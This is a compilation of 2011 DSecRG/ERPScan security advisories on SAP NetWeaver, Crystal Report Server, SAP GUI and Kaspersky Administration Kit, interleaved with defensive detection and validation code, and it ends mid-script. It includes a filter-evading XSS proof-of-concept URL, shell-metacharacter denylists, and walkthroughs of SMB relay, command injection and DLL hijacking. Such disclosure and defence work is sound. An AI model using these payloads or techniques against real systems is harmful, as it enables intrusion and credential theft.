[DSECRG-11-031] SAP RFC EPS_DELETE_FILE - Authorisation bypass, smbrelay
Digital Security Research Group [DSecRG] Advisory (Internal #DSECRG-00195)

Application:             SAP NetWeaver ABAP
Versions Affected:       SAP NetWeaver ABAP
Vendor URL:              www.sap.com
Bugs:                    Auth bypass, directory traversal, smbrelay
Exploits:                YES
Reported:                15.01.2011
Vendor response:         25.01.2011
Date of Public Advisory: 22.08.2011
CVE-number:
Author:                  Alexey Sintsov from DSecRG (ERPScan subdivision)

Description
***********
A security vulnerability was found in the SAP EPS_DELETE_FILE RFC function that allows an attacker to delete files remotely or, in a Windows environment, to steal the hashes of the SAP server account using an SMBRelay attack.

Details
*******
An attacker who can execute the EPS_DELETE_FILE function remotely, for example with default SAP accounts such as TMSADM or SAPCPIC, can delete any file in the OS, send the hashes of the SAP account to a remote host, or conduct an SMBRelay attack.

Example:
********
A working exploit will be available in the commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) and also in the ERPScan pentesting tool.

References
**********
http://dsecrg.com/pages/vul/show.php?id=331
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1554030

Fix Information
***************
The solution to this issue is given in SAP Security Note 1554030.

About DSecRG
************
The main mission of DSecRG is to conduct research on business-critical systems such as ERP, CRM, SRM, BI, SCADA, banking software and others. The results of this work are then integrated into ERPScan Security Scanner. Being at the leading edge of ERP and SAP security, DSecRG research helps to improve the quality of ERPScan consulting services and protects you from the latest threats.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com

About ERPScan
*************
ERPScan is an innovative company engaged in the research of ERP security and develops products for ERP system security assessment. Apart from this, the company renders consulting services for secure configuration, development and implementation of ERP systems, and conducts comprehensive assessments and penetration testing of custom solutions. Our flagship products are ERPScan Security Scanner for SAP and the service ERPScan Online, which help customers perform automated security assessments and compliance checks for SAP solutions.

Contact: info [at] erpscan [dot] com

Polyakov Alexander
CTO ERPScan
Head of DSecRG
__
phone:  +7 812 703 1547
        +7 812 430 9130
e-mail: a.polya...@erpscan.com
www.erpscan.com
www.dsecrg.com

---
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed.
---
[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose
Digital Security Research Group [DSecRG] Advisory DSECRG-11-032 (Internal DSecRG-00197)

Application:             SAP NetWeaver
Versions Affected:       SAP NetWeaver
Vendor URL:              http://www.SAP.com
Bugs:                    Information disclosure
Exploits:                YES
Reported:                27.01.2011
Vendor response:         28.01.2011
Date of Public Advisory: 15.09.2011
CVE-number:
Author:                  Dmitriy Chastuchin from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***********
The com.sap.ipc.webapp.ipcpricing application has an information disclosure vulnerability.

Details
*******
Will be disclosed at Brucon.

Example:
********
A working exploit will be available in the commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) and also in the ERPScan pentesting tool.

References
**********
http://dsecrg.com/pages/vul/show.php?id=332
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1545883

Fix Information
***************
The solution to this issue is given in SAP Security Note 1545883.
[DSECRG-11-034] SAP NetWeaver J2EE MeSync – information disclose
Application:             SAP NetWeaver
Versions Affected:       SAP NetWeaver MI 2
Vendor URL:              http://www.SAP.com
Bugs:                    Information disclosure
Reported:                29.07.2011
Vendor response:         30.07.2011
Date of Public Advisory: 11.11.2011
CVSS:
CVE-number:
Author:                  Alexander Polyakov from DSecRG (research center of ERPScan)

Description
***********
An attacker can obtain information about the Mobile Engine version and sometimes the name of the technical user.

Details
*******
An information disclosure vulnerability was found in SAP NetWeaver Mobile Engine which can help an attacker find the installed version and patch level of NetWeaver and also obtain a username.

Example:
********
A working exploit is available in the commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com).

References
**********
http://dsecrg.com/pages/vul/show.php?id=334

Fix Information
***************
This SatFileReceiver servlet is not shipped with MI 2. 7.02 or 7.31. It was used in MI 2.1, which is no longer supported. You should disable this application.
[DSECRG-11-037] SAP BW Doc - Multiple XSS
Application:             SAP NetWeaver
Versions Affected:       SAP NetWeaver
Vendor URL:              http://www.SAP.com
Bugs:                    XSS
Reported:                14.03.2011
Vendor response:         16.03.2011
Date of Public Advisory: 11.11.2011
CVSS:                    4.3
CVE-number:
Author:                  Alexandr Polyakov and Dmitriy Chastuchin from DSecRG (research center of ERPScan)

Description
***********
The BW DOC metadata application in SAP NetWeaver is vulnerable to an XSS attack.

Details
*******
XSS was found in the page /SAP/BW/DOC/METADATA/
Vulnerable parameter: page
To evade the XSS protection, base64 encoding and the DATA tag are used.

Example:
********
http://[SAPSERVER]/SAP/BW/DOC/METADATA/?page=%3Cobject%20data=%22data:text/html; base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=%22%3E%3C/object%3E

References
**********
http://erpscan.com/advisories/dsecrg-11-037-sap-bw-doc-multiple-xss/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1572325

Fix Information
***************
The solution to this issue is given in SAP Security Note 1572325.
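The evasion above (markup wrapped in a base64 data: URI so a naive filter does not see a script tag) is also what a defender should look for in web-server logs. The following detection logic is an added example, not code from the advisory or from SAP; it decodes the page parameter, including any base64 data: URI inside it, and flags requests to /SAP/BW/DOC/METADATA/ that carry markup. The log line format is an assumption and the sample lines are constructed.

```python
"""Detect attempts to abuse the BW DOC METADATA 'page' parameter in web logs.

Added example, not code from the advisory or from SAP: it scans constructed
access-log lines for requests to /SAP/BW/DOC/METADATA/ whose 'page' value
carries HTML markup, including markup hidden in a base64 data: URI as in
the advisory's example URL. The "METHOD TARGET STATUS" log format is an
assumption.
"""
import base64
import re
from urllib.parse import unquote, urlsplit

BW_DOC_PATH = "/SAP/BW/DOC/METADATA/"

# Anything that looks like the start of an HTML tag, e.g. <object or </script.
MARKUP_RE = re.compile(r"<\s*/?\s*[a-z]", re.I)

# data:<mime>;base64,<payload>, tolerating the space the advisory's URL has
# between the ';' and 'base64'.
DATA_URI_RE = re.compile(
    r"data:\s*[\w/+.-]+\s*;\s*base64\s*,\s*([A-Za-z0-9+/=]+)", re.I)

# Constructed sample lines. The second line reuses the advisory's own payload.
SAMPLE_LOG = """\
GET /SAP/BW/DOC/METADATA/?page=start 200
GET /SAP/BW/DOC/METADATA/?page=%3Cobject%20data=%22data:text/html;%20base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=%22%3E%3C/object%3E 200
GET /SAP/BW/DOC/METADATA/?page=%3Cb%3Ehello%3C/b%3E 200
GET /sap/bc/gui/sap/its/webgui 200
"""


def query_param(query, name):
    """Return the first value of `name` from a raw query string.

    Uses unquote() rather than parse_qs() so that a '+' inside a base64
    payload is not turned into a space before it is decoded.
    """
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if unquote(key) == name:
            return unquote(value)
    return None


def decode_data_uris(value):
    """Decode the payload of every base64 data: URI found in value."""
    decoded = []
    for match in DATA_URI_RE.finditer(value):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except ValueError:
            continue  # not valid base64: nothing to inspect
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded


def inspect_request(target):
    """Return a finding dict for a suspicious BW DOC request, else None."""
    parts = urlsplit(target)
    if not parts.path.upper().startswith(BW_DOC_PATH):
        return None
    page = query_param(parts.query, "page")
    if page is None:
        return None
    page = unquote(page)  # second pass catches double-encoded values
    reasons = []
    decoded = decode_data_uris(page)
    if any(MARKUP_RE.search(d) for d in decoded):
        reasons.append("base64 data: URI carrying markup")
    if MARKUP_RE.search(page):
        reasons.append("HTML markup in page parameter")
    if not reasons:
        return None
    return {"target": target, "page": page, "reasons": reasons, "decoded": decoded}


def scan_log(text):
    """Run inspect_request over every line; return the list of findings."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        finding = inspect_request(fields[1])
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["target"], "->", "; ".join(f["reasons"]))
```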
[DSECRG-11-038] SAP RSTXSCRP report - smb relay vulnerability
Application:             SAP NetWeaver
Versions Affected:       SAP NetWeaver
Vendor URL:              http://www.SAP.com
Bugs:                    Path traversal, SMBRelay
Reported:                14.03.2011
Vendor response:         16.03.2011
Date of Public Advisory: 11.11.2011
CVSS:                    2.1
CVE-number:
Author:                  Dmitriy Chastuchin from DSecRG (research center of ERPScan)

Description
***********
The SAP RSTXSCRP report has a path traversal vulnerability which can lead to an SMB relay attack and full control of the system.

Details
*******
Using transaction SA38 and report RSTXSCRP, an attacker can insert a malicious UNC path into the File Name field and choose the radio button "From/on application server". For a successful SMB relay attack, the attacker has to make the server initiate an SMB session to the attacker's host via the UNC path request: the SMB client will try to access a remote SMB service on the attacker's machine.

Example:
********
A working exploit is available in the commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com).

References
**********
http://erpscan.com/advisories/dsecrg-11-038-sap-rstxscrp-report-smb-relay-vulnerability/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1583286

Fix Information
***************
The solution to this issue is given in SAP Security Note 1583286.
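Both DSECRG-11-031 (EPS_DELETE_FILE) and DSECRG-11-038 (RSTXSCRP) share one root cause: a user-supplied file name reaches an OS file operation unchecked, so a UNC path makes the server open an SMB session to a host of the caller's choosing. The validator below is an added example, not SAP's code or the content of the referenced notes; it rejects UNC paths, drive letters, URL schemes and traversal, and confines the result to a base directory. The base directory and sample names are constructed.

```python
"""Reject file names that would make a server-side file function reach a
remote host or leave its directory.

Added example, not SAP's code: a file name that ends up in an OS file
operation must not be allowed to name a UNC share (\\host\share), a drive,
a URL scheme or a parent directory. Base directory and names are constructed.
"""
import posixpath
import re

# UNC prefixes (\\host\share, //host/share) and anything of the form
# "<letters>:" (drive letters such as C:, URL schemes such as file:, smb:)
# all point outside the intended directory.
REMOTE_OR_ABSOLUTE_RE = re.compile(r"^(\\\\|//|[A-Za-z][A-Za-z0-9+.-]*:)")


def reject_reason(user_name):
    """Return why user_name must be rejected, or None if it passes."""
    if not user_name or "\x00" in user_name:
        return "empty name or NUL byte"
    if REMOTE_OR_ABSOLUTE_RE.match(user_name):
        return "UNC path, drive letter or URL scheme"
    # Treat '\' like '/' so Windows-style traversal is caught on any platform.
    parts = user_name.replace("\\", "/").split("/")
    if parts[0] == "":
        return "absolute path"
    if any(p in ("", ".", "..") for p in parts):
        return "directory traversal or doubled separator"
    return None


def safe_server_path(user_name, base_dir):
    """Return base_dir joined with user_name, or None if the name is unsafe.

    The final prefix check is a second line of defence: even if one of the
    rules above is later relaxed, the result must still lie under base_dir.
    """
    if reject_reason(user_name) is not None:
        return None
    base = posixpath.normpath(base_dir)
    candidate = posixpath.normpath(
        posixpath.join(base, user_name.replace("\\", "/")))
    if not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    BASE = "/usr/sap/trans/data"  # constructed base directory
    for name in ("report.txt", "sub/report.txt", r"\\attacker\share\x",
                 "//attacker/share/x", r"..\..\etc\passwd", "C:\\temp\\x",
                 "smb://attacker/share"):
        print(repr(name), "->", reject_reason(name) or safe_server_path(name, BASE))
```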
[DSECRG-11-039] SAP NetWeaver TH_GREP module - Code injection vulnerability (NEW)
Application:             SAP NetWeaver
Versions Affected:       SAP NetWeaver
Vendor URL:              http://www.SAP.com
Bugs:                    Command execution
Reported:                08.04.2011
Vendor response:         09.04.2011
Date of Public Advisory: 11.11.2011
CVSS:                    6.0
CVE-number:
Author:                  Alexey Tyurin from DSecRG (research center of ERPScan)

Description
***********
The TH_GREP report is vulnerable to command execution even with the previous patch (note 1433101) applied. Remote OS command execution is possible.

Details
*******
This vulnerability exists in the patched version (note 1433101) because that note secures only Linux; we found that Windows is vulnerable too. Command execution is possible via the TH_GREP RFC function on Windows. The problem is the absence of user input validation of the TH_GREP RFC function's parameters: an attacker can insert malicious code into the STRING parameter for command execution. There are at least 3 ways of command execution, and the attacker must have valid credentials:
1) In transaction SE37
2) Via the startrfc command with the TH_GREP RFC function
3) Via a crafted TH_GREP RFC SOAP request

Example:
********
A working exploit is available in the commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com).

References
**********
http://erpscan.com/advisories/dsecrg-11-039-sap-netweaver-th_grep-module-code-injection-vulnerability-new/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1580017

Fix Information
***************
The solution to this issue is given in SAP Security Note 1580017.
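The lesson of DSECRG-11-039 is that a fix which blocks one platform's shell metacharacters leaves the other platform exposed. The code below is an added example, not SAP's code or the content of note 1433101 or 1580017: it contrasts two platform-specific denylists with one allowlist for the search string and builds the OS search call as an argument vector with no shell. The grep/findstr argv layout and the trace file name are assumptions.

```python
"""Platform-independent validation of a search string passed to an OS grep.

Added example, not SAP's code: the denylists show how a rule written for a
POSIX shell misses cmd.exe metacharacters (and vice versa); the allowlist
does not depend on which shell, if any, sits behind the call. How TH_GREP
actually invokes the OS tool is not known here; the argv layout is assumed.
"""
import re

# Metacharacters that let a string escape into the shell. The two sets
# overlap but are not the same: '%' and '^' matter only to cmd.exe,
# '$' and '`' only to sh.
SH_META = set('|&;<>()$`\\"\' \t\n*?[]{}#~')
CMD_META = set('|&<>^%!"\n')

# Allowlist: letters, digits and punctuation that neither shell interprets.
ALLOWED_RE = re.compile(r"^[A-Za-z0-9_.:/@,=+-]{1,128}$")


def denylist_rejects(search_string, platform):
    """True if search_string contains a metacharacter of that platform's shell."""
    meta = CMD_META if platform == "windows" else SH_META
    return any(ch in meta for ch in search_string)


def allowlist_accepts(search_string):
    """True if every character is in the allowlist (same rule on every OS)."""
    return ALLOWED_RE.match(search_string) is not None


def build_grep_argv(search_string, trace_file, platform):
    """Build an argument vector for the OS search tool without a shell.

    Raises ValueError if the string fails the allowlist. The result is meant
    for subprocess.run(argv) with shell=False, so no command interpreter
    ever parses the user-supplied string.
    """
    if not allowlist_accepts(search_string):
        raise ValueError("search string contains disallowed characters")
    if platform == "windows":
        return ["findstr", "/C:" + search_string, trace_file]
    return ["grep", "--", search_string, trace_file]


if __name__ == "__main__":
    for s in ("ERROR_2011", "x$(date)", "x%PATH%", "a|b"):
        print(repr(s),
              "sh denylist rejects:", denylist_rejects(s, "linux"),
              "cmd denylist rejects:", denylist_rejects(s, "windows"),
              "allowlist accepts:", allowlist_accepts(s))
```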
[DSECRG-11-040] SAP NetWeaver SPML - XML CSRF user creation
Application:             SAP NetWeaver
Versions Affected:       SAP NetWeaver
Vendor URL:              http://www.SAP.com
Bugs:                    CSRF
Reported:                14.03.2011
Vendor response:         15.03.2011
Date of Public Advisory: 11.11.2011
CVSS:                    7.3
CVE-number:
Author:                  Alexandr Polyakov from DSecRG (research center of ERPScan)

Description
***********
An attacker can create a new user in the J2EE Engine using a CSRF attack on the SPML service.

Details
*******
The SPML service can be used to perform various actions, including user management, role management etc. An attacker can generate an HTTP page with an XML call to the SPML service and send a link to an administrator.

Example:
********
A working exploit is available in the commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com).

References
**********
http://erpscan.com/advisories/dsecrg-11-040-sap-netweaver-spml-xml-csrf-user-creation/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1616058
http://erpscan.com/wp-content/uploads/2011/08/A-crushing-blow-at-the-heart-SAP-J2EE-engine_whitepaper.pdf

Fix Information
***************
The solution to this issue is given in SAP Security Note 1616058.
[DSECRG-11-041] SAP NetWeaver - Authentication bypass (Verb Tampering)
Application:             SAP NetWeaver
Versions Affected:       SAP NetWeaver
Vendor URL:              http://www.SAP.com
Bugs:                    Auth bypass, Verb tampering
Reported:                14.03.2011
Vendor response:         15.03.2011
Date of Public Advisory: 11.11.2011
CVSS:                    7.3 by SAP (10 by ERPSCAN)
CVE-number:
Author:                  Alexandr Polyakov from DSecRG (research center of ERPScan)

Description
***********
An authentication bypass vulnerability in the SAP NetWeaver CTC service can be exploited for unauthorized user management and OS command execution.

Details
*******
An attacker can bypass authentication using a Verb Tampering vulnerability.

Example:
********
A working exploit is available in the commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com).

References
**********
http://erpscan.com/advisories/dsecrg-11-041-sap-netweaver-authentication-bypass-verb-tampering/
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1589525
http://erpscan.com/wp-content/uploads/2011/08/A-crushing-blow-at-the-heart-SAP-J2EE-engine_whitepaper.pdf

Fix Information
***************
The solution to this issue is given in SAP Security Notes 1589525 and 1624450.
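Verb tampering of the kind DSECRG-11-041 describes works because a J2EE security constraint that lists http-method elements protects only those methods, and the container happily dispatches any other verb. The model below is an added example, not SAP's code or the CTC service's configuration: it reproduces that rule so the weak and the corrected constraint can be compared; the /admin/* pattern and the role name are constructed.

```python
"""Model of why a per-verb security constraint can be bypassed.

Added example, not SAP's code or configuration: it reproduces the servlet
specification's rule that a <security-constraint> listing <http-method>
elements protects only those methods, while a constraint with none covers
every method. The /admin/* pattern and the role name are constructed.
"""

PROBE_METHODS = ("GET", "POST", "HEAD", "PUT", "DELETE", "OPTIONS", "TRACE")

# Two constraints written as dicts mirroring web.xml elements.
# WEAK lists GET and POST only: an unlisted verb reaches the servlet without
# authentication, and HttpServlet by default serves HEAD through doGet().
WEAK = [{"url_patterns": ["/admin/*"], "http_methods": {"GET", "POST"},
         "roles": {"administrators"}}]
# FIXED omits <http-method>, so the constraint applies to every verb.
FIXED = [{"url_patterns": ["/admin/*"], "roles": {"administrators"}}]


def pattern_matches(url_pattern, path):
    """Servlet-style matching: exact, path prefix (/x/*) or extension (*.jsp)."""
    if url_pattern.endswith("/*"):
        prefix = url_pattern[:-2]
        return path == prefix or path.startswith(prefix + "/")
    if url_pattern.startswith("*."):
        return path.endswith(url_pattern[1:])
    return path == url_pattern


def requires_auth(constraints, method, path):
    """True if some constraint covers this method and path."""
    for c in constraints:
        if not any(pattern_matches(p, path) for p in c["url_patterns"]):
            continue
        methods = c.get("http_methods")
        if not methods or method.upper() in methods:
            return True
    return False


def uncovered_methods(constraints, path, probe=PROBE_METHODS):
    """List the verbs that reach `path` without authentication."""
    return [m for m in probe if not requires_auth(constraints, m, path)]


if __name__ == "__main__":
    print("weak  :", uncovered_methods(WEAK, "/admin/users"))
    print("fixed :", uncovered_methods(FIXED, "/admin/users"))
```

On containers that implement Servlet 3.1, `<deny-uncovered-http-methods/>` in web.xml makes the container reject the verbs this model reports as uncovered instead of dispatching them.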
[DSECRG-11-033] SAP Crystal Report Server pubDBLogon - Linked XSS vulnerability
An XSS vulnerability was found in the pubDBLogon.jsp page of SAP Crystal Report Server 2008.

Application:             SAP Crystal Report Server 2008
Versions Affected:       SAP Crystal Report Server 2008
Vendor URL:              http://www.sap.com
Bugs:                    Linked XSS Vulnerability
Exploits:                YES
Reported:                09.12.2010
Vendor response:         10.12.2010
Date of Public Advisory: 15.09.2011
Authors:                 Dmitry Chastuhin

Description
***********
SAP Crystal Report Server 2008 contains a variety of features with which users can manage and share interactive reports and dashboards, as well as provide access to them via the Internet.

Details
*******
The vulnerability was discovered in the JSP page pubDBLogon.jsp.
Vulnerable parameter: service
Any user can craft a vulnerable link and steal a user's or the Administrator's cookie.

References
**********
http://dsecrg.com/pages/vul/show.php?id=333
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1562292

Fix Information
***************
The solution to this issue is given in SAP Security Note 1562292.
CFP for first independent international Security Conference in Russia - ZeroNights (by Defcon-Russia)
http://zeronights.org/request

Saint-Petersburg, Russia, 25th of November

The CFP consists of 2 steps:
- Participation requests for the first step are accepted until 20.09.11.
- The program committee decision about the first part of the speakers will be available on 30.09.11.
- Participation requests for the second step are accepted until 20.10.11.
- The final program committee decision will be available on 30.10.11.

Requests should be sent to c...@zeronights.ru.

A speaker's request must consist of:
- Name and surname
- E-mail
- Biography (in short)
- Job, position
- Residence
- Report name
- Brief description of the presentation (not more than 500 words; this is the description for the web-site)
- Full description (technical details):
  - whether there are 0-day vulnerabilities
  - whether any tools will be presented at the conference
- Topic status (whether it was previously shown/published; if yes, when and where)
- Personal requirements for the presentation

We are highly interested in the following topics:
- Corporate application security
- Security of applications and services operating with financial funds
- State project security
- SCADA security
- Communication systems security
- Russian software security
- Mobile device security
- Malicious software
- Social networks and Web 2.0 hacking
- Researching programs without source code
- Vulnerability searching and exploiting
- Software, hardware and network research

This topic list is not complete but preferred. Presentations on other subjects can be considered as well. We do not accept marketing talks or talks aimed at selling products without technical information. Slides/talks must be presented in Russian or English.

As a speaker, you will receive a partial refund of your travel expenses. Good mood, a pleasant community and a lot of unforgettable feelings in the northern capital of Russia are guaranteed.

Polyakov Alexander
QSA, PA-QSA
CTO ERPScan
Head of DSecRG
[DSECRG-11-032] SAP NetWeaver ipcpricing - information disclose (by ERPScan)
Digital Security Research Group [DSecRG] Advisory DSECRG-11-032 (Internal DSecRG-00197)

Application:             SAP NetWeaver
Versions Affected:       SAP NetWeaver
Vendor URL:              http://www.SAP.com
Bugs:                    Information disclosure
Exploits:                YES
Reported:                27.01.2011
Vendor response:         28.01.2011
Date of Public Advisory: 15.09.2011
CVE-number:
Author:                  Dmitriy Chastuchin from DSecRG (subdivision of ERPScan)

Description
***********
The com.sap.ipc.webapp.ipcpricing application has an information disclosure vulnerability.

Details
*******
Will be disclosed at Brucon.

Example:
********
A working exploit will be available in the commercial scanner ERPScan Security Scanner for SAP (http://erpscan.com) and also in the ERPScan pentesting tool.

References
**********
http://erpscan.com/advisories/dsecrg-11-032-sap-netweaver-ipcpricing-information-disclose/
http://dsecrg.com/pages/vul/show.php?id=332
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1545883

Fix Information
***************
The solution to this issue is given in SAP Security Note 1545883.

Polyakov Alexander
QSA, PA-QSA
CTO ERPScan
Head of DSecRG
[DSECRG-11-018] Kaspersky administration Kit - Remote code execution via SMBRelay
Digital Security Research Group [DSecRG] Advisory #DSECRG-11-018

Application: Kaspersky Administration Kit
Versions Affected: from 6.0
Vendor URL: http://www.kaspersky.com
Bug: Design flaw
Exploits: YES
Reported: 22.01.2011
Vendor response: 22.01.2011
Solution: disable IP scan
Date of Public Advisory: 14.03.2011
Authors: Alexey Sintsov of Digital Security Research Group [DSecRG]

Description
***
The service account used by Kaspersky Administration Kit and its functionality make an attack on other hosts in a corporate network possible.

Details
***
A function called Scan IP subnets is enabled by default in Kaspersky Administration Kit 6. This function performs an ICMP scan and also tries to use the SMB protocol with the service account, which can be used to run an SMBRelay attack and gain full control of the secured network. By default Scan IP subnets scans the subnet every 7 hours. An attacker just needs to run an SMBRelay tool and wait. The attack is possible because the Kaspersky service account has administrative rights on hosts in the corporate network. This means that an attacker can attack any server or workstation where this service account has rights.

Fix Information
***
1) Do not start the Administration Server service under a Domain Administrator account or a domain account that is a member of the local Administrators group on other hosts.
2) Disable Scan IP subnets: http://support.kaspersky.com/faq/?qid=208284121

References
*
http://dsecrg.ru/pages/vul/show.php?id=318
http://dsecrg.blogspot.com/2011/03/smbrelay-bible-4-smbrelay-with-no.html

Polyakov Alexandr.
PCI QSA,PA-QSA
CTO Digital Security
Head of DSecRG
__
DIGITAL SECURITY
phone: +7 812 703 1547
       +7 812 430 9130
e-mail: a.polya...@dsec.ru
www.dsec.ru www.dsecrg.com www.dsecrg.ru www.erpscan.com www.erpscan.ru www.pcidssru.com www.pcidss.ru
[DSECRG-11-013] SAP NetWeaver Runtime - multiple XSS
SAP NetWeaver Integration Directory has linked XSS vulnerabilities.

Digital Security Research Group [DSecRG] Advisory DSecRG-11-013 (Internal DSecRG-00163)

Application: SAP NetWeaver Runtime
Versions Affected: SAP NetWeaver Runtime
Vendor URL: http://www.sap.com
Bugs: Linked XSS and Stored XSS
Exploits: YES
Reported: 11.05.2010
Vendor response: 12.05.2010
Date of Public Advisory: 09.03.2011
CVE-number:
Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***
SAP NetWeaver Integration Directory has linked XSS vulnerabilities.
1. XSS in error_msg.jsp
2. XSS in ViewCaches.jsp
3. Stored XSS in ViewLogger.jsp
4. POST and Stored XSS in ShowMemLog

Details
***
1. Vulnerable script: error_msg.jsp
   Vulnerable parameters: id
2. Vulnerable script: ViewCaches.jsp
   Vulnerable parameters: refresh
3. Vulnerable script: ViewLogger.jsp
   Vulnerable parameters: logger
4. Vulnerable servlet: ShowMemLog
   Vulnerable parameters: thread, class (stored xss), invert, filter

Example:
**
Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=313
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1512776

Fix Information
*
Solution to this issue is given in the 1512776 security note.

About
*
Digital Security: is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, ERP and SAP security assessment, certification for ISO/IEC 27001:2005 and PCI DSS and PA DSS standards.

Digital Security Research Group: international subdivision of Digital Security company focused on research and software development for securing business-critical systems like enterprise applications (ERP, CRM, SRM), technology systems (SCADA, Smart Grid) and banking software. DSecRG developed the new product ERPSCAN security suite for SAP and the service ERPSCAN Online, which can help customers to perform automated security assessments and compliance checks for SAP solutions.

Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
http://www.erpscan.com
[DSECRG-11-012] SAP NetWeaver Integration Directory - multiple XSS
SAP NetWeaver Integration Directory has multiple linked XSS vulnerabilities.

Digital Security Research Group [DSecRG] Advisory DSecRG-11-012 (Internal DSecRG-00159)

Application: SAP NetWeaver XI
Versions Affected: SAP NetWeaver XI
Vendor URL: http://www.sap.com
Bugs: XSS
Exploits: YES
Reported: 09.06.2010
Vendor response: 10.06.2010
Date of Public Advisory: 09.03.2011
CVE-number:
Author: Dmitriy Evdokimov from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
SAP NetWeaver Integration Directory has multiple linked XSS vulnerabilities.

Details
***
1. Vulnerable servlet: CheckService
   Vulnerable parameters: fileNameL, directoryNameL
2. Vulnerable servlet: ExportabilityCheck
   Vulnerable parameters: fileNameL, directoryNameL
3. Vulnerable servlet: ViewCaches
   Vulnerable parameters: XiDynPage_ThreadId
4. Vulnerable servlet: ShowMemLog
   Vulnerable parameters: thread

Example:
**
Working exploit will be available in commercial scanner ERPSCAN security scanner for SAP (ERPSCAN.com).

References
**
http://dsecrg.com/pages/vul/show.php?id=312
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1512776

Fix Information
*
Solution to this issue is given in the 1512776 security note.
[DSECRG-11-014] SAP GUI (sapgui) - DLL hijacking
SAP Front End applications (SAPGui.exe) are vulnerable to DLL hijacking attacks. This makes remote code execution possible.

Digital Security Research Group [DSecRG] Advisory DSecRG-11-014 (Internal DSecRG-00183)

Application: SAP GUI
Versions Affected: 6.4 - 7.2
Vendor URL: http://www.sap.com
Bugs: DLL hijacking
Exploits: YES
Reported: 24.08.2010
Vendor response: 26.08.2010
Date of Public Advisory: 09.03.2011
CVE-number:
Author: Alexey Sintsov, Alexandr Polyakov, Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)

Description
***
SAP Front End applications (SAPGui.exe) are vulnerable to DLL hijacking attacks. This makes remote code execution possible.

Details
***
An attacker can place SAP GUI shortcuts (.sap) in his shared directory. In the same directory he places DLLs with malicious code. The DLL name will be MFC80RUS.DLL (for Russian systems) or MFC80LOC.DLL for SAPGui.exe. Then the attacker gets a link to the shortcut to a victim. When the victim tries to open the shortcut, the SAP application tries to load its DLLs from the working directory, which is the attacker's shared directory. So the attacker's DLLs will be loaded by the victim and the malicious code from these libraries will be executed. This happens because SAPGui.exe and BExAnalyzer.exe look for the libraries in the working directory before the system directories.

References
**
http://dsecrg.com/pages/vul/show.php?id=314
http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a
https://service.sap.com/sap/support/notes/1511179

Fix Information
*
Solution to this issue is given in the 1511179 security note.
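The precondition the advisory describes, a .sap shortcut sitting beside a DLL with one of the names SAPGui.exe resolves from its working directory, can be audited on a file share before users open shortcuts from it. The following is an added example, not part of the advisory or of SAP's fix: a Python audit that walks a directory tree (a mounted share or a local copy of one) and reports every directory holding .sap shortcuts together with DLL files, flagging the two DLL names the advisory gives. The sample tree created by build_demo_tree is constructed for the demonstration; the directory and file names in it are assumptions.

```python
import os
import tempfile

# DLL names the advisory says SAPGui.exe resolves from the working directory
# before the system directories (MFC80RUS.DLL on Russian systems).
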